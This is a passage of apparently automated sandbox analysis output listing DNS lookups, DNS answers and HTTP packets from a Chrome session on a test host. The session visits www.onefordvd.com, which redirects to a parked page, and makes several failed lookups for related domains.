                                                                          Aug 29, 2024 17:12:31.590953112 CEST53641431.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:31.593971968 CEST53525691.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:32.178540945 CEST53582031.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:36.633745909 CEST5690753192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:36.634052038 CEST6273953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:36.665052891 CEST53569071.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:36.680179119 CEST6542253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:12:36.690865040 CEST53654221.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:36.796798944 CEST53627391.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:12:50.971236944 CEST53535861.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:06.043868065 CEST5283653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:13:06.053914070 CEST53528361.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:06.703795910 CEST5186453192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:13:06.703931093 CEST5221353192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:13:07.172674894 CEST53518641.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:07.231280088 CEST4926953192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:13:07.245523930 CEST53492691.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:07.307838917 CEST53522131.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:13.378654003 CEST53593741.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:13.645889044 CEST53528501.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:26.714133024 CEST5955253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:13:26.726206064 CEST53595521.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:13:41.754156113 CEST53623221.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:14:07.266853094 CEST5004253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:14:07.267029047 CEST5011653192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:14:07.277966976 CEST53501161.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:14:07.278088093 CEST53500421.1.1.1192.168.2.5
                                                                          Aug 29, 2024 17:14:07.278671980 CEST6467253192.168.2.51.1.1.1
                                                                          Aug 29, 2024 17:14:07.309833050 CEST53646721.1.1.1192.168.2.5

                                                                          ICMP Packets

                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                          Aug 29, 2024 17:12:36.796895981 CEST192.168.2.51.1.1.1c231(Port unreachable)Destination Unreachable
                                                                          Aug 29, 2024 17:13:07.307929039 CEST192.168.2.51.1.1.1c231(Port unreachable)Destination Unreachable

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Aug 29, 2024 17:12:10.960086107 CEST192.168.2.51.1.1.10xcb00Standard query (0)1861119.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.046870947 CEST192.168.2.51.1.1.10x5fcaStandard query (0)www.onefordvd.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.047013998 CEST192.168.2.51.1.1.10x668fStandard query (0)www.onefordvd.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.931062937 CEST192.168.2.51.1.1.10xcc6aStandard query (0)www.onefordvd.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.931216002 CEST192.168.2.51.1.1.10x510fStandard query (0)www.onefordvd.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.346203089 CEST192.168.2.51.1.1.10x8cabStandard query (0)msg.tmhacker.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.366192102 CEST192.168.2.51.1.1.10x1Standard query (0)msg.tmhacker.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.764729023 CEST192.168.2.51.1.1.10x7f38Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.764920950 CEST192.168.2.51.1.1.10x97f8Standard query (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.765275955 CEST192.168.2.51.1.1.10x239bStandard query (0)btloader.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.765399933 CEST192.168.2.51.1.1.10x9180Standard query (0)btloader.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.765850067 CEST192.168.2.51.1.1.10x3bd2Standard query (0)img1.wsimg.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.766103983 CEST192.168.2.51.1.1.10x2591Standard query (0)img1.wsimg.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.341173887 CEST192.168.2.51.1.1.10xb210Standard query (0)syndicatedsearch.googA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.341335058 CEST192.168.2.51.1.1.10x5946Standard query (0)syndicatedsearch.goog65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.472395897 CEST192.168.2.51.1.1.10x4809Standard query (0)ad-delivery.netA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.472742081 CEST192.168.2.51.1.1.10x3ed9Standard query (0)ad-delivery.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.473582029 CEST192.168.2.51.1.1.10x2ffaStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.473762989 CEST192.168.2.51.1.1.10xb4d6Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.055983067 CEST192.168.2.51.1.1.10x1a6Standard query (0)btloader.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.057051897 CEST192.168.2.51.1.1.10x2624Standard query (0)btloader.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.059462070 CEST192.168.2.51.1.1.10xdbfdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.059663057 CEST192.168.2.51.1.1.10x2befStandard query (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.365657091 CEST192.168.2.51.1.1.10x6d4cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.365761995 CEST192.168.2.51.1.1.10x21b4Standard query (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.276772022 CEST192.168.2.51.1.1.10x1f10Standard query (0)api.aws.parking.godaddy.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.277312040 CEST192.168.2.51.1.1.10xf57fStandard query (0)api.aws.parking.godaddy.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.456661940 CEST192.168.2.51.1.1.10xf53bStandard query (0)ad-delivery.netA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.456815958 CEST192.168.2.51.1.1.10xc22bStandard query (0)ad-delivery.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.459553957 CEST192.168.2.51.1.1.10x7de3Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.459781885 CEST192.168.2.51.1.1.10x1facStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.482933044 CEST192.168.2.51.1.1.10x241eStandard query (0)img1.wsimg.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.483064890 CEST192.168.2.51.1.1.10x42b8Standard query (0)img1.wsimg.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.896522999 CEST192.168.2.51.1.1.10x2ae7Standard query (0)syndicatedsearch.googA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.896697044 CEST192.168.2.51.1.1.10xf8baStandard query (0)syndicatedsearch.goog65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.132491112 CEST192.168.2.51.1.1.10x733dStandard query (0)api.aws.parking.godaddy.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.132661104 CEST192.168.2.51.1.1.10xbf99Standard query (0)api.aws.parking.godaddy.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:22.608262062 CEST192.168.2.51.1.1.10x495aStandard query (0)afs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:22.608814955 CEST192.168.2.51.1.1.10xd20dStandard query (0)afs.googleusercontent.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:23.623505116 CEST192.168.2.51.1.1.10xf92fStandard query (0)syndicatedsearch.googA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:23.623783112 CEST192.168.2.51.1.1.10x1329Standard query (0)syndicatedsearch.goog65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:24.065898895 CEST192.168.2.51.1.1.10xc2a2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:24.066342115 CEST192.168.2.51.1.1.10xf54fStandard query (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:26.018728018 CEST192.168.2.51.1.1.10x2224Standard query (0)afs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:26.018879890 CEST192.168.2.51.1.1.10x503dStandard query (0)afs.googleusercontent.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:28.232295990 CEST192.168.2.51.1.1.10x699aStandard query (0)1861119.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:28.578124046 CEST192.168.2.51.1.1.10xaad5Standard query (0)msg.tmhacker.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.666058064 CEST192.168.2.51.1.1.10xe3e7Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.666214943 CEST192.168.2.51.1.1.10x8c74Standard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.847732067 CEST192.168.2.51.1.1.10xa928Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.151204109 CEST192.168.2.51.1.1.10xb269Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.151901960 CEST192.168.2.51.1.1.10x2b9fStandard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.397177935 CEST192.168.2.58.8.8.80x4aadStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.397434950 CEST192.168.2.51.1.1.10xe32eStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:31.583036900 CEST192.168.2.51.1.1.10xb4beStandard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:31.583197117 CEST192.168.2.51.1.1.10x35b6Standard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.633745909 CEST192.168.2.51.1.1.10xecdeStandard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.634052038 CEST192.168.2.51.1.1.10x7d8Standard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.680179119 CEST192.168.2.51.1.1.10x114bStandard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:06.043868065 CEST192.168.2.51.1.1.10x31f7Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:06.703795910 CEST192.168.2.51.1.1.10x6274Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:06.703931093 CEST192.168.2.51.1.1.10x3c4fStandard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:13:07.231280088 CEST192.168.2.51.1.1.10xf7f0Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:26.714133024 CEST192.168.2.51.1.1.10xe02Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.266853094 CEST192.168.2.51.1.1.10xea09Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.267029047 CEST192.168.2.51.1.1.10x1983Standard query (0)www.dvdforone.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.278671980 CEST192.168.2.51.1.1.10xc977Standard query (0)www.dvdforone.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Aug 29, 2024 17:12:10.992037058 CEST1.1.1.1192.168.2.50xcb00Name error (3)1861119.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.230212927 CEST1.1.1.1192.168.2.50x5fcaNo error (0)www.onefordvd.com15.197.204.56A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.230212927 CEST1.1.1.1192.168.2.50x5fcaNo error (0)www.onefordvd.com3.33.243.145A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.944226980 CEST1.1.1.1192.168.2.50xcc6aNo error (0)www.onefordvd.com15.197.204.56A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:14.944226980 CEST1.1.1.1192.168.2.50xcc6aNo error (0)www.onefordvd.com3.33.243.145A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.771605015 CEST1.1.1.1192.168.2.50x7f38No error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.771625996 CEST1.1.1.1192.168.2.50x97f8No error (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.771872997 CEST1.1.1.1192.168.2.50x239bNo error (0)btloader.com172.67.41.60A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.771872997 CEST1.1.1.1192.168.2.50x239bNo error (0)btloader.com104.22.75.216A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.771872997 CEST1.1.1.1192.168.2.50x239bNo error (0)btloader.com104.22.74.216A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.772713900 CEST1.1.1.1192.168.2.50x9180No error (0)btloader.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.777225018 CEST1.1.1.1192.168.2.50x2591No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.779580116 CEST1.1.1.1192.168.2.50x3bd2No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:15.835113049 CEST1.1.1.1192.168.2.50x1Name error (3)msg.tmhacker.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.420237064 CEST1.1.1.1192.168.2.50xb210No error (0)syndicatedsearch.goog172.217.16.206A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.479425907 CEST1.1.1.1192.168.2.50x4809No error (0)ad-delivery.net172.67.69.19A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.479425907 CEST1.1.1.1192.168.2.50x4809No error (0)ad-delivery.net104.26.2.70A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.479425907 CEST1.1.1.1192.168.2.50x4809No error (0)ad-delivery.net104.26.3.70A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.481298923 CEST1.1.1.1192.168.2.50x3ed9No error (0)ad-delivery.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.481981993 CEST1.1.1.1192.168.2.50xb4d6No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:17.482273102 CEST1.1.1.1192.168.2.50x2ffaNo error (0)ad.doubleclick.net216.58.206.38A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.062526941 CEST1.1.1.1192.168.2.50x1a6No error (0)btloader.com172.67.41.60A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.062526941 CEST1.1.1.1192.168.2.50x1a6No error (0)btloader.com104.22.74.216A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.062526941 CEST1.1.1.1192.168.2.50x1a6No error (0)btloader.com104.22.75.216A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.064054966 CEST1.1.1.1192.168.2.50x2624No error (0)btloader.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.066381931 CEST1.1.1.1192.168.2.50x2befNo error (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.066971064 CEST1.1.1.1192.168.2.50xdbfdNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.372340918 CEST1.1.1.1192.168.2.50x6d4cNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:18.372389078 CEST1.1.1.1192.168.2.50x21b4No error (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.295773983 CEST1.1.1.1192.168.2.50x1f10No error (0)api.aws.parking.godaddy.comgddomainparking.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.295773983 CEST1.1.1.1192.168.2.50x1f10No error (0)gddomainparking.com54.174.215.77A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.295773983 CEST1.1.1.1192.168.2.50x1f10No error (0)gddomainparking.com35.170.142.141A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:19.295789003 CEST1.1.1.1192.168.2.50xf57fNo error (0)api.aws.parking.godaddy.comgddomainparking.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.463551044 CEST1.1.1.1192.168.2.50xc22bNo error (0)ad-delivery.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.464247942 CEST1.1.1.1192.168.2.50xf53bNo error (0)ad-delivery.net104.26.2.70A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.464247942 CEST1.1.1.1192.168.2.50xf53bNo error (0)ad-delivery.net104.26.3.70A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.464247942 CEST1.1.1.1192.168.2.50xf53bNo error (0)ad-delivery.net172.67.69.19A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.466523886 CEST1.1.1.1192.168.2.50x1facNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.466562986 CEST1.1.1.1192.168.2.50x7de3No error (0)ad.doubleclick.net142.250.186.166A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.490946054 CEST1.1.1.1192.168.2.50x42b8No error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.506532907 CEST1.1.1.1192.168.2.50x241eNo error (0)img1.wsimg.comglobal-wildcard.wsimg.com.sni-only.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:20.903687000 CEST1.1.1.1192.168.2.50x2ae7No error (0)syndicatedsearch.goog142.250.184.238A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.143326998 CEST1.1.1.1192.168.2.50xbf99No error (0)api.aws.parking.godaddy.comgddomainparking.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.152234077 CEST1.1.1.1192.168.2.50x733dNo error (0)api.aws.parking.godaddy.comgddomainparking.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.152234077 CEST1.1.1.1192.168.2.50x733dNo error (0)gddomainparking.com54.174.215.77A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:21.152234077 CEST1.1.1.1192.168.2.50x733dNo error (0)gddomainparking.com35.170.142.141A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:22.619158030 CEST1.1.1.1192.168.2.50x495aNo error (0)afs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:22.619158030 CEST1.1.1.1192.168.2.50x495aNo error (0)googlehosted.l.googleusercontent.com142.250.186.161A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:22.619266033 CEST1.1.1.1192.168.2.50xd20dNo error (0)afs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:23.908694983 CEST1.1.1.1192.168.2.50xf92fNo error (0)syndicatedsearch.goog142.250.184.238A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:24.073435068 CEST1.1.1.1192.168.2.50xc2a2No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:24.074997902 CEST1.1.1.1192.168.2.50xf54fNo error (0)www.google.com65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:26.026874065 CEST1.1.1.1192.168.2.50x2224No error (0)afs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:26.026874065 CEST1.1.1.1192.168.2.50x2224No error (0)googlehosted.l.googleusercontent.com142.250.184.193A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:26.027375937 CEST1.1.1.1192.168.2.50x503dNo error (0)afs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:28.404875994 CEST1.1.1.1192.168.2.50x699aName error (3)1861119.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:28.787944078 CEST1.1.1.1192.168.2.50xaad5Name error (3)msg.tmhacker.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.675889015 CEST1.1.1.1192.168.2.50x8c74Name error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.839440107 CEST1.1.1.1192.168.2.50xe3e7Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:29.857098103 CEST1.1.1.1192.168.2.50xa928Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.208724976 CEST1.1.1.1192.168.2.50xb269Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.208878040 CEST1.1.1.1192.168.2.50x2b9fName error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.617733955 CEST1.1.1.1192.168.2.50xe32eNo error (0)google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:30.617774963 CEST8.8.8.8192.168.2.50x4aadNo error (0)google.com142.251.37.14A (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:31.590953112 CEST1.1.1.1192.168.2.50x35b6Name error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:12:31.593971968 CEST1.1.1.1192.168.2.50xb4beName error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.665052891 CEST1.1.1.1192.168.2.50xecdeName error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.690865040 CEST1.1.1.1192.168.2.50x114bName error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:12:36.796798944 CEST1.1.1.1192.168.2.50x7d8Name error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:13:06.053914070 CEST1.1.1.1192.168.2.50x31f7Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:07.172674894 CEST1.1.1.1192.168.2.50x6274Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:07.245523930 CEST1.1.1.1192.168.2.50xf7f0Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:13:07.307838917 CEST1.1.1.1192.168.2.50x3c4fName error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:13:26.726206064 CEST1.1.1.1192.168.2.50xe02Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.277966976 CEST1.1.1.1192.168.2.50x1983Name error (3)www.dvdforone.comnonenone65IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.278088093 CEST1.1.1.1192.168.2.50xea09Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false
                                                                          Aug 29, 2024 17:14:07.309833050 CEST1.1.1.1192.168.2.50xc977Name error (3)www.dvdforone.comnonenoneA (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.onefordvd.com
                                                                          • https:
                                                                            • btloader.com
                                                                            • www.google.com
                                                                            • ad-delivery.net
                                                                            • ad.doubleclick.net
                                                                            • api.aws.parking.godaddy.com
                                                                            • syndicatedsearch.goog
                                                                            • afs.googleusercontent.com
                                                                            • www.bing.com
                                                                          • fs.microsoft.com
                                                                          • slscr.update.microsoft.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.54970715.197.204.56804040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Aug 29, 2024 17:12:14.266983986 CEST432OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:14.749639034 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:12:14.805321932 CEST474OUTGET /lander HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Referer: http://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:14.922194958 CEST285INHTTP/1.1 301 Moved Permanently
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 67
                                                                          Connection: keep-alive
                                                                          Location: https://www.onefordvd.com/lander
                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6e 65 66 6f 72 64 76 64 2e 63 6f 6d 2f 6c 61 6e 64 65 72 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="https://www.onefordvd.com/lander">Moved Permanently</a>.
                                                                          Aug 29, 2024 17:12:14.939589024 CEST494OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
